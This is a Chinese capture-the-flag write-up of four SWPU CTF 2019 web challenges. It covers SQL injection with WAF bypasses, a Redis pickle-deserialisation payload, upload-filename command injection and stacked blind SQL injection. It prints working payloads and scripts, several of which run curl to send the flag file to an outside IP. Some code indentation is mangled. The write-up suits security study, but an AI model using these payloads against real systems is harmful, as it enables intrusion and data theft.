2019 SWPU CTF Web Writeup

一叶飘零 Web安全 2019年12月9日发布
Favorite收藏

导语:12月比赛有点少,手有点生了,发现SWPU又开始了,还记得去年质量挺高的,于是来玩玩,下面是web的解题记录。

前言

12月比赛有点少,手有点生了,发现SWPU又开始了,还记得去年质量挺高的,于是来玩玩,下面是web的解题记录。

easy_web

随便注册一个用户进入,发现有广告发送的地方,随手测试:

2019-12-06-10-02-12.png

点入发现触发了sql报错:

2019-12-06-10-02-05.png

随手又试了一下:

2019-12-06-10-02-19.png

发现确实可以闭合:

2019-12-06-10-02-26.png

首先尝试联合查询注入:

exp:
0' union select  1,2,3,'a'='a
waf:
0'unionselect1,2,3,'a'='a

发现空格会被替换成空,于是尝试用如下方式bypass:

0'/**/union/**/select/**/1,2,3,'a'='a

但发现列数过多,随机放弃这个方法,选择报错注入:

1'/**/||/**/ST_LatFromGeoHash(concat(0x7e,(select/**/database()),0x7e))/**/||'a'='a

2019-12-06-12-45-46.png

测试过程中发现,or被过滤,我们无法获取表名和列名,那么首先查看一下mysql版本:

1'/**/||/**/ST_LatFromGeoHash(concat(0x7e,(select/**/version()),0x7e))/**/||'a'='a

2019-12-06-12-46-42.png

发现版本很高,思考mysql新特性:

select/**/table_name/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()

但发现mysql被过滤,继续查找新特性:

sys.schema_auto_increment_columns

2019-12-06-12-50-22.png

爆表:

2019-12-06-12-52-18.png

尝试爆表:

1'/**/&&/**/ST_LatFromGeoHash(concat(0x7e,(select/**/group_concat(table_name)/**/from/**/sys.schema_auto_increment_columns/**/where/**/table_schema='web1'),0x7e))/**/&&'a'='a

2019-12-06-12-58-21.png

发现成功获取表名,但是无法爆列名,但是可以使用无列名注入:

select i.1 from (select 1,2,3 union select * from flag)i

即可无需列名注入指定列数据:

1'/**/&&/**/ST_LatFromGeoHash(concat(0x7e,(select/**/i.2/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)i/**/limit/**/1,1),0x7e))/**/&&'a'='a

2019-12-06-13-03-40.png

发现第二列是flag,那么注第3列:

1'/**/&&/**/ST_LatFromGeoHash(concat(0x7e,(select/**/i.3/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)i/**/limit/**/1,1),0x7e))/**/&&'a'='a

2019-12-06-13-03-56.png

成功获取flag:

swpuctf{Simple_Double_Injectin}

python简单题

随便注册一个账户登入:

2019-12-06-13-15-36.png

发现提示是Redis,随机测试一下:

2019-12-06-13-20-56.png

发现需要授权,那么随手尝试弱密码:

2019-12-06-13-21-22.png

结果直接就进去了,我惊呆了= =,看看里面有啥:

2019-12-06-13-41-08.png

随便读一个内容:

2019-12-06-13-21-40.png

那么不难想到,就是构造序列化,携带session访问时触发,进行任意命令执行。

查看自己的session:

2019-12-06-13-41-32.png

那么利用脚本写入一个session:

#!/usr/bin/env python
#
import cPickle
import os
import redis
class exp(object):
    def __reduce__(self):
        s = """curl -d '@/flag' 106.14.114.127:23333"""
        return (os.system, (s,))
e = exp()
s = cPickle.dumps(e)
r = redis.Redis(host='114.67.109.247', port=6379, db=0, password='password')
r.set("session:1013122a-70cc-4251-b3e0-05d5731b3ae3", s)

然后刷新页面,flag即可获得:

2019-12-06-13-40-20.png

swpuctf{u6frAFrJoWXnf4w6w0Q1-By@mYz}

easy_python

进入题目,发现有上传功能,但显示权限不足:

Permission denied!

那么猜想需要伪造session:

{"id":{" b":"100"},"is_login":true,"password":"sss","username":"sss"}

那么显然需要将自己伪造成id为1的用户,但是要伪造session,必须要secretkey,那么尝试模板注入:

2019-12-07-09-25-36.png

发现response中有:

SWPUCTF_CSRF_Token: U0VDUkVUX0tFWTprZXlxcXF3d3dlZWUhQCMkJV4mKg==

解码后得到:

SECRET_KEY:keyqqqwwweee!@#$%^&*

于是进行session伪造:

.eJyrVspMUbKqVlJIUrJS8g20tVWq1VHKLI7PyU_PzFOyKikqTdVRKkgsLi7PLwIqVEpMyQWK6yiVFqcW5SXmpsKFagFiyxgX.XekyGw.wYomzVd7LK9ea7WN-mZaQ0gldjg

即可进入文件上传功能:

2019-12-07-09-31-42.png

上传功能提示只允许上传zip,我们测试:

2019-12-07-09-34-59.png

发现上传后,服务器会解压压缩包。

于是尝试软连接:

2019-12-07-09-38-41.png

发现可以成功任意文件读取,读取了:

/proc/self/maps
/proc/self/cwd
/proc/self/cmdline
....

发现都没找到路径,结果F12,发现源码写在注释里……喷血= =。

@app.route('/upload',methods=['GET','POST'])
def upload():
    if session['id'] != b'1':
        return render_template_string(temp)
    if request.method=='POST':
        m = hashlib.md5()
        name = session['password']
        name = name+'qweqweqwe'
        name = name.encode(encoding='utf-8')
        m.update(name)
        md5_one= m.hexdigest()
        n = hashlib.md5()
        ip = request.remote_addr
        ip = ip.encode(encoding='utf-8')
        n.update(ip)
        md5_ip = n.hexdigest()
        f=request.files['file']
        basepath=os.path.dirname(os.path.realpath(__file__))
        path = basepath+'/upload/'+md5_ip+'/'+md5_one+'/'+session['username']+"/"
        path_base = basepath+'/upload/'+md5_ip+'/'
        filename = f.filename
        pathname = path+filename
        if "zip" != filename.split('.')[-1]:
            return 'zip only allowed'
        if not os.path.exists(path_base):
            try:
                os.makedirs(path_base)
            except Exception as e:
                return 'error'
        if not os.path.exists(path):
            try:
                os.makedirs(path)
            except Exception as e:
                return 'error'
        if not os.path.exists(pathname):
            try:
                f.save(pathname)
            except Exception as e:
                return 'error'
        try:
            cmd = "unzip -n -d "+path+" "+ pathname
            if cmd.find('|') != -1 or cmd.find(';') != -1:
waf()
                return 'error'
            os.system(cmd)
        except Exception as e:
            return 'error'
        unzip_file = zipfile.ZipFile(pathname,'r')
        unzip_filename = unzip_file.namelist()[0]
        if session['is_login'] != True:
            return 'not login'
        try:
            if unzip_filename.find('/') != -1:
                shutil.rmtree(path_base)
                os.mkdir(path_base)
                return 'error'
            image = open(path+unzip_filename, "rb").read()
            resp = make_response(image)
            resp.headers['Content-Type'] = 'image/png'
            return resp
        except Exception as e:
            shutil.rmtree(path_base)
            os.mkdir(path_base)
            return 'error'
    return render_template('upload.html')
@app.route('/showflag')
def showflag():
    if True == False:
        image = open(os.path.join('./flag/flag.jpg'), "rb").read()
        resp = make_response(image)
        resp.headers['Content-Type'] = 'image/png'
        return resp
    else:
        return "can't give you"

发现敏感点:

   try:
            cmd = "unzip -n -d "+path+" "+ pathname
            if cmd.find('|') != -1 or cmd.find(';') != -1:
waf()
                return 'error'
            os.system(cmd)

此处我们可以进行命令注入,跟踪path和pathname:

    f=request.files['file']
    basepath=os.path.dirname(os.path.realpath(__file__))
    path = basepath+'/upload/'+md5_ip+'/'+md5_one+'/'+session['username']+"/"
    path_base = basepath+'/upload/'+md5_ip+'/'
    filename = f.filename
    pathname = path+filename

发现文件名可以进行命令注入,于是测试:

filename="$(curl vps_ip:23333).zip"

2019-12-07-10-01-51.png

发现可以收到请求,尝试外带数据:

$(curl 106.14.114.127:23333 -T `pwd`).zip

2019-12-07-10-05-12.png

那么尝试读取flag:

./flag/flag.jpg

但是遇到问题:

if unzip_filename.find('/') != -1:
if cmd.find('|') != -1 or cmd.find(';') != -1:

我们发现过滤了一些关键符号,那么只能尝试构造符号,随便搜一个ascii转字符的命令:

https://blog.csdn.net/c20130911/article/details/73187757

即可进行字符转换:

2019-12-07-10-08-44.png

那么我们伪造/:

2019-12-07-10-12-35.png

那么构造exp:

$(sky=`awk 'BEGIN{printf "%c\n",47}'`&&curl vps_ip:23333 -T `cat .${sky}flag${sky}flag.jpg`)

将图片带出后,做一些修改,删除FFD8前的数据,打开即可得到flag:

image.png

demo_mvc

发现比赛太晚,做的时候已经有hint了:

无需扫描 hint:PDO::query

那么不难想到,应该是有注入了:

2019-12-07-10-23-54.png

对于PDO,我首先想到的是堆叠注入,随机测试一下:

select sleep(5)

2019-12-07-10-26-11.png

发现成功sleep 5秒,那么尝试爆库爆表爆字段:

首先测试:

select if((ascii(substr((database()),1,1))>-1),sleep(5),1)
{"username":"sss';SET @aaa=0x73656c6563742069662828617363696928737562737472282864617461626173652829292c312c3129293e2d31292c736c6565702835292c3129;PREPARE test FROM @aaa;EXECUTE test;","password":"sss'"}

发现成功sleep 5秒,随后测试payload:

select if((ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),1,1))>-1),sleep(5),1)
{"username":"sss';SET @aaa=0x73656c6563742069662828617363696928737562737472282873656c6563742067726f75705f636f6e636174285441424c455f4e414d45292066726f6d20696e666f726d6174696f6e5f736368656d612e5441424c4553207768657265205441424c455f534348454d413d64617461626173652829292c312c3129293e2d31292c736c6565702835292c3129;PREPARE test FROM @aaa;EXECUTE test;","password":"sss'"}

发现依旧成功sleep 5秒,那么开始编写exp:

import requests
exp = '''{"username":"sss';SET @aaa=0x%s;PREPARE test FROM @aaa;EXECUTE test;","password":"sss'"}'''
#payload = 'select if((ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),%s,1))=%s),sleep(5),1)'
#payload = 'select if((ascii(substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x666C6167),%s,1))=%s),sleep(5),1)'
payload = 'select if((ascii(substr((select flag from flag limit 0,1),%s,1))=%s),sleep(5),1)'
url = 'http://182.92.220.157:11116/index.php?r=Login/Login'
res = ''
for i in range(1,100):
print i
for j in range(32,127):
now_payload = payload %(i,j)
now_exp = exp % now_payload.encode('hex')
try:
r = requests.post(url=url,data=now_exp,timeout=4.5)
except:
res +=chr(j)
print res

得到表名:

flag,user

flag表中列名:

flag

于是读取数据,得到:

AmOL#T.zip

下载后发现是代码审计。

View/userIndex.php

发现文件读取:

2019-12-07-10-46-01.png

构造:

http://182.92.220.157:11116/index.php?r=User/Index&img_file=/../flag.php

即可获取flag:

2019-12-07-10-22-08.png

得到flag:

swpuctf{H@ve_a_g00d_t1me_durin9_swpuctf2019}

后记

做了4道题,最后一题看是java xxe,估计要结合一个特性,自己对java不是很熟,就不去肝了。不过前4题做下来,感觉难度比往年低了不少。

本文为 一叶飘零 原创稿件,授权嘶吼独家发布,如若转载,请注明原文地址: https://beta.4hou.com/web/21991.html
点赞 4
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论